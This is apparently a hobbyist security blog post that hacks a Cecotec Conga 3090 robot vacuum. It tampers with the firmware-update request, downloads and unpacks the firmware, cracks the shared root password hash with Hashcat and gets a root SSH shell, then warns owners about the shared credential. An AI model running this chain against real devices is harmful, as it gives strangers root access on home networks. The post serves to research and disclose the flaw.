IoT devices are filling our houses these last days, so many Christmas gifts that can help us in our daily tasks, like remotely watching your baby or your pets, turning on the air conditioning or keeping the house floor clean but… are we safe to use these devices on our home network? Can someone hack my vacuum?
Let’s take a look at a very common device: Cecotec Conga 3090. It has had many sales (and many returns) and now replaced by the new model 3490
Today’s victim: Conga 3090
This model was the Cecotec flagship until model 4090 was released and with a price of 350-400€ had a great impact on the automatic vacuum market.
Reconnaissance
Let’s check at first sight what it exposes on our LAN:
It exposes a DNS service with dnsmasq and a SSH port with a Dropbear so, we need more info to get into there.
We now switch to Burp Suite just to make a HTTP(s) Proxy, route all phone traffic through it and see what the app can tell us. (You can follow a tutorial for this here)
Aaaaand surprise, we got a GET Request checking if there’s an update available for our product, and asking for the package ramdisk_sys that’s a good entry point! so lets forward this request to Repeater and check the parameters:
GET /device_update?product=CECOTECCRL20A-Release&version=S1.2.38&sn=&pkg_name=ramdisk_sys HTTP/1.1
Host: eu.ota.3irobotics.net:5000
Accept: /
User-Agent: SCCRobot/2.2.0 (es.cecotec.s3090v1; build:1; iOS 13.3.0) Alamofire/4.7.3
Accept-Language: es-ES;q=1.0
Accept-Encoding: gzip, deflate
Connection: close
This request give us a HTTP 200 OK but an empty JSON {}, so maybe it’s because we have the last version installed?, Let’s try lowering the version to 1.2.34
Voilà, we now have the URI of the ramdisk package, let’s download it and inspect it
christian@kali:~/cecotec$ wget http://eu.ota.3irobotics.net:5000/static/ota_packages/CECOTECCRL20A-Release/S1.2.38/ramdisk_sys.tar.gz
Resolviendo eu.ota.3irobotics.net (eu.ota.3irobotics.net)… 47.91.94.73, 47.254.145.60, 47.91.87.185
Conectando con eu.ota.3irobotics.net (eu.ota.3irobotics.net)[47.91.94.73]:5000… conectado.
Petición HTTP enviada, esperando respuesta… 200 OK
Longitud: 23422553 (22M) [application/x-tar]
Grabando a: “ramdisk_sys.tar.gz”
ramdisk_sys.tar.gz 100%[=============================================================>] 22,34M 1,03MB/s en 21s
2020-01-05 13:43:06 (1,06 MB/s) - “ramdisk_sys.tar.gz” guardado [23422553/23422553]
christian@kali:~/cecotec$ tar -xzvf ramdisk_sys.tar.gz
ramdisk_sys/
ramdisk_sys/boot_initramfs.img.md5
ramdisk_sys/boot_initramfs.img
christian@kali:~/cecotec$ cd ramdisk_sys/
christian@kali:~/cecotec/ramdisk_sys$ ls -lah
total 33M
drwxr-xr-x 2 christian christian 4,0K sep 17 12:33 .
drwxr-xr-x 3 christian christian 4,0K ene 5 13:43 ..
-rw-r--r-- 1 christian christian 32M sep 17 12:33 boot_initramfs.img
-rw-r--r-- 1 christian christian 33 sep 17 12:33 boot_initramfs.img.md5
Nice! that looks like we have a 32Mb initramfs image, therefore it’s time to let binwalk do it’s job:
christian@kali:~/cecotec/ramdisk_sys$ binwalk boot_initramfs.img
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
82432 0x14200 uImage header, header size: 64 bytes, header CRC: 0x9D836DC1, created: 2018-09-30 01:28:12, image size: 23381900 bytes, Data Address: 0x40008000, Entry Point: 0x40008000, data CRC: 0x8CA6E59A, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: "ARM OpenWrt Linux-3.4.39"
82496 0x14240 Linux kernel ARM boot executable zImage (little-endian)
98643 0x18153 gzip compressed data, maximum compression, from Unix, last modified: 1970-01-01 00:00:00 (null date)
Gaining access
We discovered that OpenWrt is the OS running inside the vacuum so we will try to decompress the image and get interesting data inside, starting by re-launching binwalk with –matryoshka and start rubbing your hands together while watching the entire file system decompress.
If you have a very quick view, you have surely seen a very interesting file: ./
And… well… it’s a MD5 hash, and if we got a good videocard on our system therefore we can switch to Hashcat, using -m 500 ( md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
) and our favorite dictionary(like the CrackStation one) or an online service like OnlineHashCrack
Now that we have that sweetie password, let’s try to SSH in:
christian@kali:~$ ssh [email protected]
[email protected]'s password:
BusyBox v1.24.1 () built-in shell (ash)
_____ _ __ _
|_ _||_| ___ _ _ | | |_| ___ _ _ _ _
| | _ | || | | |__ | || || | ||_'_|
| | | || | || _ | |_____||_||_|_||___||_,_|
|_| |_||_|_||_|_| Tina is Based on OpenWrt!
----------------------------------------------
Tina Linux (Neptune, 57513AA3)
----------------------------------------------
root@TinaLinux:~#
We’re in!!!. Now I really beg you to update your vacuum root password everytime it gets an update because that password is the same on all Cecotec Conga 3090 models, for instance, anyone that get access to your Wifi, can hack your vacuum and install any persistence module there!